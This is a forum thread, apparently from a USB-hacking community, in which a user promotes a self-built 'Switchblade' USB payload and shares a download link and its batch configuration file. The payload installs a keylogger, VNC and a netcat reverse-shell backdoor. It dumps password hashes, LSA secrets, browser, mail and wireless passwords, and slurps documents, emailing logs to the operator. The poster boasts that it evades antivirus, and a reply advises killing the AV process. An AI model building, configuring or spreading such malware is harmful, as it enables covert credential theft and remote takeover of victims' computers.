Jump to content

Xqtftqx Switchblade (In Progress)


Recommended Posts

Posted

Alright, ive noticed that non of the payloads fit my style. so i decieded to make one.

Its features so far are

-Installs Backdoor (thanks to stablefoxx)

-Installs VNC

-Gets IP adress

-Gets open ports

-Gets History

-Gets  Mail Passwords

-Gets Network Passwords

-Gets Passwords

-Gets Product Keys

-Gets running Apps

-Gets Services

-Gets Updates

-Gets User Account Info

-Gets Wireless Passwords

-Plants Keylogger

-Gets TXT's

So far thats it, none are found by my av.

If you got any questions please ask me

If you have any suggestions please ask me.

Download:

http://rapidshare.com/files/73533260/Xqtftqx.zip.html

------------------------------------------------------------------------

Upcoming Features:

Pwdump

lsa secrets

cache

plants a little app to allow you to log there clipboard

and more!

  • Replies 60
  • Created
  • Last Reply

Top Posters In This Topic

Posted

Just taskkill avg!  :-P quick and dirty fix

  • 1 month later...
Posted

K, thanks.

the hardest part about realsing this is gonna be documentation. i t does so much. and its so complex. i tried making it as noob friendly as i can but, thell still need a shit load of instructions and what everything does and editing the settings file.

Posted

Thanks, im almost finished with documentation.

Im gonna post it up as soon as i finish the bugs.

I realy need some help coding this. if anybody can help. please PM me.

Current Features of current version (Not realsed version)

-Files in 7z archive

-Install Keylogger

-Install VNC

-Install Hacksaw

-Install Netcat Backdoor (Reverse)

-Dumps Running Services

-Dumps Password Hash's

-Dumps IP adress

-Dumps Firefox Passwords

-Dumps Clipboard

-Dump Internet Explorer Passwords

-Dump Mozzila History

-Dumps USB logs

-Dumps Open Ports

-Dumps Mail Passwords

-Dumps Running Apps

-Dump Network Passwords

-Dumps IM Passwords

-Port Scan

-Dumps LSA secrets

-Dumps Wireless Keys

-Dumps Windows Updates

-Dumps Internet Explorer History

-Dumps Cache

-Podslurp Files

As you can see, it does a lot. There is also some optional features. they follow

-Check for Safety.txt

-Run minimized

Theres Also a easy configuration file.

Here, Ill post it. tell me if you think its noob friendly.

:::XQTFTQX PAYLOAD SETTINGS FILE:::

:::::::::::::General Options:::::::::::::

::Configure Email Options
set emailfrom=
set emailto=
set password=

::Configure IP Adress
set ip=0000000

:::::::::::::Payload Optional Features:::::::::::::

::Check for Safety.txt
set safety=1

::Run Payload Silently
set hide=0

:::::::::::::File Slurping Options:::::::::::::

::Enable Slurp
set slurp=1

::Locations for Slurp (And All Sub directorys
set slurplocation1=C:Documents and Settings%username%My Documents
set slurplocation2=C:Documents and Settings%username%Desktop
set slurplocation3=

::Document Types To Slurp
set slurptype1=doc
set slurptype2=xml
set slurptype3=mp3
set slurptype4=bmp
set slurptype5=txt

:::::::::::::Payload Modules:::::::::::::

::Install Keylogger
set keylog=0

::Install Hacksaw
set hacksaw=0

::Install VNC
set vnc=0

::Install Backdoor
set nc=0

::Grab Keylogger log
set grabkeylog=0

::Grab Running Services
set services=0

::Dump Password Hashes
set hashes=0

::Dump IP Adress
set dumpip=0

::Dump Firefox Passwords
set firefoxpw=0

::Dump Clipboard
set clipboard=0

::Dump Internet Explorer passwords
set ippw=0

::Dump Firefox History
set firefoxh=0

::Dump USB logs
set usb=0

::Dump Open ports
set ports=0

::Dump Mail Passwords
set mail=0

::Dump running Apps
set apps=0

::Dump Network passwords
set netpass=0

::Dump IM passwords
set im=0

::Port scan
set scanports=0

::Dump LSA secrets
set lsa=0

::Dump wireless passwords
set wireless=0

::Dump Windows Updates
set updates=0

::Dump Internet explorer history
set ieh=0

::Dump Cache
set cache=0

Basicly, when you run it it edits the batch files to the email and ip.

Email used for hacksaw and keylogger (emails every 5 hours)

ip used for backdoor. very simple to use. run a batch file. and modife the ip to yours and it connects to a reverse shell.

And for all the log files changing the 0 to a 1 enables. So, what do you think?

Posted

wow looks very good!! like it , and can add to copy receive file from IM and history log but right now is very great payload.

About the coding , well i dont know a lot but i can try  :)

Supervisor.

Posted

Will this have the ability to turn off or on certain features? The one I"m using now has a SBConfig.exe file that you can customize your attack. Or is this one all or none kinda thing?

Posted

if you  dont want to install the keylogger then just set 0 in the option in the code above and this will be disable, its like SBconfig.exe of Gonzor payload just no GUI .

Supervisor

Posted

And the location ;)

As for im history, probly not because im history loggin has to be enabled. i chould do sometihng were, it enabled then grabs. not sure if its a reg key or not

Posted

I don`t mean Miranda that need the *.dat file. I mean IcqMsn history.

Msn history is in "C:Documents and Settings%username%My DocumentsMy Received Files" and there there is all the files that received and the history in a sub folder.

About the icq history folder is in a hidden folder "C:Documents & Settings%username%Application DataICQ"

so i think that copy option can go to the slurp

And again if you need some help , i will do my best to help you.

Supervisor

  • 4 weeks later...
Posted

beta realse coming! its not going to be public, drop me a email with subject "USB" and your'll be on the list! only 19 spots left! so hurry up! email: xqtftqxt@gmail.com

it will be realsed when 20 people sighn up.

EDIT:Ive changed my email, all messages backed up

Posted

Email sent.

Can you add a list of what are the things the switchblade do?

new things, bugs - all the things that make this one to a beta release

its can be usefull :)

Supervisor

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...